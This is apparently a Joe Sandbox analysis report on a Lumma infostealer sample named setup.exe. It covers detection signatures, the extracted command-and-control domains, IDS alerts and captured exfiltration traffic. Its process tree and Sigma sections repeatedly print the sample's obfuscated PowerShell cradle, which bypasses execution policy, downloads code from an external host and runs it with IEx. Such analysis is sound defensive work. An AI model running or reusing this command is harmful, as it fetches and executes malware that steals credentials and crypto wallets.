Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1585368
MD5:76f2e89ace5c9b36679ce13b57c8b752
SHA1:736b004b46dfb5d0fef7758406883a22f15b1649
SHA256:16c3793c3deafcfb489b2347d08bfd0a420ce0f8c27dd4afeea05d9d9a99f413
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • setup.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 76F2E89ACE5C9B36679CE13B57C8B752)
    • powershell.exe (PID: 7332 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "fairiespar.cyou", "abruptyopsn.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "hRjzG3--ALFA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x5179f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1417442248.00000000008D1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: setup.exe PID: 5916JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: setup.exe PID: 5916JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 5916, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, ProcessId: 7332, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 5916, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, ProcessId: 7332, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 5916, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, ProcessId: 7332, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 5916, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, ProcessId: 7332, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 5916, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, ProcessId: 7332, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 5916, ParentProcessName: setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -, ProcessId: 7332, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T15:26:18.078230+010020283713Unknown Traffic192.168.2.749726188.114.97.3443TCP
              2025-01-07T15:26:19.141494+010020283713Unknown Traffic192.168.2.749732188.114.97.3443TCP
              2025-01-07T15:26:20.232927+010020283713Unknown Traffic192.168.2.749742188.114.97.3443TCP
              2025-01-07T15:26:21.479323+010020283713Unknown Traffic192.168.2.749749188.114.97.3443TCP
              2025-01-07T15:26:22.665292+010020283713Unknown Traffic192.168.2.749760188.114.97.3443TCP
              2025-01-07T15:26:24.288140+010020283713Unknown Traffic192.168.2.749772188.114.97.3443TCP
              2025-01-07T15:26:25.484416+010020283713Unknown Traffic192.168.2.749779188.114.97.3443TCP
              2025-01-07T15:26:30.959508+010020283713Unknown Traffic192.168.2.749816188.114.97.3443TCP
              2025-01-07T15:26:32.302034+010020283713Unknown Traffic192.168.2.749823185.161.251.21443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T15:26:18.576159+010020546531A Network Trojan was detected192.168.2.749726188.114.97.3443TCP
              2025-01-07T15:26:19.583691+010020546531A Network Trojan was detected192.168.2.749732188.114.97.3443TCP
              2025-01-07T15:26:31.425192+010020546531A Network Trojan was detected192.168.2.749816188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T15:26:18.576159+010020498361A Network Trojan was detected192.168.2.749726188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T15:26:19.583691+010020498121A Network Trojan was detected192.168.2.749732188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T15:26:20.821930+010020480941Malware Command and Control Activity Detected192.168.2.749742188.114.97.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://klipvumisui.shop/c&Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop:443/int_clp_sha.txtg0lhAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop:443/int_clp_sha.txtAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txt?Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtIeAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/)Avira URL Cloud: Label: malware
              Source: https://dfgh.online/invoker.php?compName=hZAvira URL Cloud: Label: malware
              Found malware configuration
              Source: setup.exe.5916.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "fairiespar.cyou", "abruptyopsn.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "hRjzG3--ALFA"}
              Multi AV Scanner detection for submitted file
              Source: setup.exeReversingLabs: Detection: 15%
              Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49779 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49816 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.7:49823 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49726 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49726 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49742 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49816 -> 188.114.97.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: fairiespar.cyou
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49726 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49742 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49772 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49760 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49779 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49749 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49816 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49823 -> 185.161.251.21:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fairiespar.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: fairiespar.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TYDIAY273User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12789Host: fairiespar.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q61JI54KSSXTH9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15051Host: fairiespar.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AHNCTC1XIG648DUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20382Host: fairiespar.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HGEE2DGAOBV12WIIPM8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1250Host: fairiespar.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O7VDALVF2KL0A50MGLZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1110Host: fairiespar.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: fairiespar.cyou
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: fairiespar.cyou
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fairiespar.cyou
              Source: setup.exeString found in binary or memory: Http://Www.SkyGz.Com
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: setup.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: setup.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
